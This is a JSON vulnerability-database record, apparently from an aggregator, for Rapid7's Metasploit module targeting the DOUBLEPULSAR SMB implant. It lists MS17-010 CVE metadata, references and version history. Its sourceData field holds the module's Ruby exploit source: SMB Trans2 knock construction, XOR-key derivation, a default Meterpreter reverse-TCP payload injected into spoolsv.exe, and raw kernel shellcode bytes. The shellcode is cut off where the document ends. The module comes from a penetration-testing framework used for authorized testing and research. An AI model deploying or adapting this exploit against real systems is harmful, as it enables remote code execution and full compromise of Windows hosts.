"6c1573fb8afad953575e88410f63a2fc"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "bc9f4d2df77a7e598c51cbbb28b6c763"}, {"key": "published", "hash": "b60f5906fe6c7ab38d837f22d4eafee6"}, {"key": "references", "hash": "5b950e6a1604ac171f8fe1ccc327b50e"}, {"key": "reporter", "hash": "74798933f90c8c8a3dcac277d7c31e76"}, {"key": "title", "hash": "a399fb2a0d2b54be61b63ce9fb2f1e84"}, {"key": "type", "hash": "6719951e37a5b7c4b959f8df50c9d641"}], "scheme": null}, {"id": "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "hash": "37a59697b8bf700899c7482ddd4a73575b4458f187d3ff962fb314916bc9874d", "type": "metasploit", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution", "description": "This module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.\n", "published": "2020-02-03T17:16:16", "modified": "2020-06-09T12:18:52", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html", "https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/", "https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/", 
"https://github.com/countercept/doublepulsar-detection-script", "https://github.com/countercept/doublepulsar-c2-traffic-decryptor", "https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1"], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148"], "lastseen": "2020-10-03T19:20:37", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "description": "This module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.\n", "edition": 1, "enchantments": {"dependencies": {"modified": "2020-10-03T19:20:37", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["KB4013389", "KB4012598"], "type": "mskb"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], 
"type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"], "type": "trendmicroblog"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": 
"avleonov"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-10-03T19:20:37", "rev": 2, "value": 7.8, "vector": "NONE"}}, "hash": "d2c2dbee920907ec88d6ede164e6a44fcecdff927ad3de6ca391edbdb39a6aba", "hashmap": [{"hash": "a350165a58d78e6a7f1ec63091a5caba", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "79b03fa9178806f1694441cff96d84a3", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "href"}, {"hash": "c25dabffe89097874a062017ca347cc8", "key": "published"}, {"hash": "2a4acb977d851155649ad6e4f1698975", "key": "references"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "74798933f90c8c8a3dcac277d7c31e76", "key": 
"reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "6719951e37a5b7c4b959f8df50c9d641", "key": "type"}, {"hash": "142f691ada068c40ae71fdd0eac8502e", "key": "cvelist"}, {"hash": "fe7cd07cb53ebe88d1bb8c3cb4d4de83", "key": "title"}], "history": [], "href": "", "id": "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "immutableFields": [], "lastseen": "2020-10-03T19:20:37", "modified": "2020-06-09T12:18:52", "objectVersion": "1.5", "published": "2020-02-03T17:16:16", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/", "https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1", "https://github.com/countercept/doublepulsar-detection-script", "https://github.com/countercept/doublepulsar-c2-traffic-decryptor", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "title": "SMB DOUBLEPULSAR Remote Code Execution", "type": "metasploit", "viewCount": 844}, "different_elements": ["cvss3", "cvss2"], "edition": 1, "lastseen": "2020-10-03T19:20:37"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "This module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. 
While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.\n", "enchantments": {"dependencies": {"modified": "2020-07-12T16:01:04", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/BROWSER/MS08_053_MEDIAENCODER", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", 
"MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": 
["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-07-12T16:01:04", "rev": 2, "value": 7.8, "vector": "NONE"}}, "hash": "87ca22fd843673ff2ae5372d0047960d", "history": [], "href": "", "id": "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "lastseen": "2020-07-12T16:01:04", "metasploitHistory": "", "metasploitReliability": "", "modified": "2020-02-03T17:19:20", "objectVersion": "1.4", "published": "2020-01-29T19:00:00", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/", "https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1", "https://github.com/countercept/doublepulsar-detection-script", "https://github.com/countercept/doublepulsar-c2-traffic-decryptor", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::SMB::Client\n 
include Msf::Module::Deprecated\n\n moved_from 'exploit/windows/smb/doublepulsar_rce'\n\n MAX_SHELLCODE_SIZE = 4096\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\n 'Description' => %q{\n This module executes a Metasploit payload against the Equation Group's\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\n\n While this module primarily performs code execution against the implant,\n the \"Neutralize implant\" target allows you to disable the implant.\n },\n 'Author' => [\n 'Equation Group', # DOUBLEPULSAR implant\n 'Shadow Brokers', # Equation Group dump\n 'zerosum0x0', # DOPU analysis and detection\n 'Luke Jennings', # DOPU analysis and detection\n 'wvu', # Metasploit module and arch detection\n 'Jacob Robles' # Metasploit module and RCE help\n ],\n 'References' => [\n ['MSB', 'MS17-010'],\n ['CVE', '2017-0143'],\n ['CVE', '2017-0144'],\n ['CVE', '2017-0145'],\n ['CVE', '2017-0146'],\n ['CVE', '2017-0147'],\n ['CVE', '2017-0148'],\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\n ],\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Privileged' => true,\n 'Payload' => {\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\n 'DisableNops' => true\n },\n 'Targets' => [\n ['Execute payload (x64)',\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n ],\n 
['Neutralize implant',\n 'DefaultOptions' => {\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'AKA' => ['DOUBLEPULSAR'],\n 'RelatedModules' => [\n 'auxiliary/scanner/smb/smb_ms17_010',\n 'exploit/windows/smb/ms17_010_eternalblue'\n ],\n 'Stability' => [CRASH_OS_DOWN],\n 'Reliability' => [REPEATABLE_SESSION]\n }\n ))\n\n register_advanced_options([\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\n ])\n end\n\n OPCODES = {\n ping: 0x23,\n exec: 0xc8,\n kill: 0x77\n }.freeze\n\n STATUS_CODES = {\n not_detected: 0x00,\n success: 0x10,\n invalid_params: 0x20,\n alloc_failure: 0x30\n }.freeze\n\n def calculate_doublepulsar_status(m1, m2)\n STATUS_CODES.key(m2.to_i - m1.to_i)\n end\n\n # algorithm to calculate the XOR Key for DoublePulsar knocks\n def calculate_doublepulsar_xor_key(s)\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\n x & 0xffffffff # this line was added just to truncate to 32 bits\n end\n\n # The arch is adjacent to the XOR key in the SMB signature\n def calculate_doublepulsar_arch(s)\n s == 0 ? 
ARCH_X86 : ARCH_X64\n end\n\n def generate_doublepulsar_timeout(op)\n k = SecureRandom.random_bytes(4).unpack1('V')\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\n end\n\n def generate_doublepulsar_param(op, body)\n case OPCODES.key(op)\n when :ping, :kill\n \"\\x00\" * 12\n when :exec\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\n end\n end\n\n def check\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\n\n @tree_id = do_smb_setup_tree(ipc_share)\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\n vprint_status(\"Target OS is #{smb_peer_os}\")\n\n print_status('Sending ping to DOUBLEPULSAR')\n code, signature1, signature2 = do_smb_doublepulsar_pkt\n msg = 'Host is likely INFECTED with DoublePulsar!'\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n @xor_key = calculate_doublepulsar_xor_key(signature1)\n @arch = calculate_doublepulsar_arch(signature2)\n\n arch_str =\n case @arch\n when ARCH_X86\n 'x86 (32-bit)'\n when ARCH_X64\n 'x64 (64-bit)'\n end\n\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\n CheckCode::Vulnerable\n when :not_detected\n print_error('DOUBLEPULSAR not detected or disabled')\n CheckCode::Safe\n else\n print_error('An unknown error occurred')\n CheckCode::Unknown\n end\n end\n\n def exploit\n if datastore['DefangedMode']\n warning = <<~EOF\n\n\n Are you SURE you want to execute code against a nation-state implant?\n You MAY contaminate forensic evidence if there is an investigation.\n\n Disable the DefangedMode option if you have authorization to proceed.\n EOF\n\n fail_with(Failure::BadConfig, warning)\n end\n\n # No ForceExploit because @tree_id and @xor_key are required\n unless check == CheckCode::Vulnerable\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\n end\n\n case target.name\n when 'Execute payload (x64)'\n unless @xor_key\n fail_with(Failure::NotFound, 
'XOR key not found')\n end\n\n if @arch == ARCH_X86\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\n end\n\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\n\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\n\n print_status('Sending shellcode to DOUBLEPULSAR')\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\n when 'Neutralize implant'\n return neutralize_implant\n end\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n print_good('Payload execution successful')\n when :invalid_params\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\n when :alloc_failure\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\n else\n fail_with(Failure::Unknown, 'An unknown error occurred')\n end\n ensure\n disconnect\n end\n\n def neutralize_implant\n print_status('Neutralizing DOUBLEPULSAR')\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n print_good('Implant neutralization successful')\n else\n fail_with(Failure::Unknown, 'An unknown error occurred')\n end\n end\n\n def do_smb_setup_tree(ipc_share)\n connect\n\n # logon as user \\\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\n\n # connect to IPC$\n simple.connect(ipc_share)\n\n # return tree\n simple.shares[ipc_share]\n end\n\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\n # make doublepulsar knock\n pkt = make_smb_trans2_doublepulsar(opcode, body)\n\n sock.put(pkt)\n bytes = sock.get_once\n\n 
return unless bytes\n\n # convert packet to response struct\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\n pkt.from_s(bytes[4..-1])\n\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\n end\n\n def make_smb_trans2_doublepulsar(opcode, body)\n setup_count = 1\n setup_data = [0x000e].pack('v')\n\n param = generate_doublepulsar_param(opcode, body)\n data = param + body.to_s\n\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\n simple.client.smb_defaults(pkt['Payload']['SMB'])\n\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\n param_offset = base_offset\n data_offset = param_offset + param.length\n\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\n\n @multiplex_id = rand(0xffff)\n\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\n\n pkt['Payload'].v['ParamCountTotal'] = param.length\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\n pkt['Payload'].v['ParamCountMax'] = 1\n pkt['Payload'].v['DataCountMax'] = 0\n pkt['Payload'].v['ParamCount'] = param.length\n pkt['Payload'].v['ParamOffset'] = param_offset\n pkt['Payload'].v['DataCount'] = body.to_s.length\n pkt['Payload'].v['DataOffset'] = data_offset\n pkt['Payload'].v['SetupCount'] = setup_count\n pkt['Payload'].v['SetupData'] = setup_data\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\n pkt['Payload'].v['Payload'] = data\n\n pkt.to_s\n end\n\n # ring3 = user mode encoded payload\n # proc_name = process to inject APC into\n def make_kernel_user_payload(ring3, proc_name)\n sc = make_kernel_shellcode(proc_name)\n\n sc << [ring3.length].pack('S<')\n sc << ring3\n\n sc\n end\n\n def generate_process_hash(process)\n # x64_calc_hash from 
external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n proc_hash = 0\n process << \"\\x00\"\n\n process.each_byte do |c|\n proc_hash = ror(proc_hash, 13)\n proc_hash += c\n end\n\n [proc_hash].pack('l<')\n end\n\n def ror(dword, bits)\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\n end\n\n def make_kernel_shellcode(proc_name)\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n # Length: 780 bytes\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\n 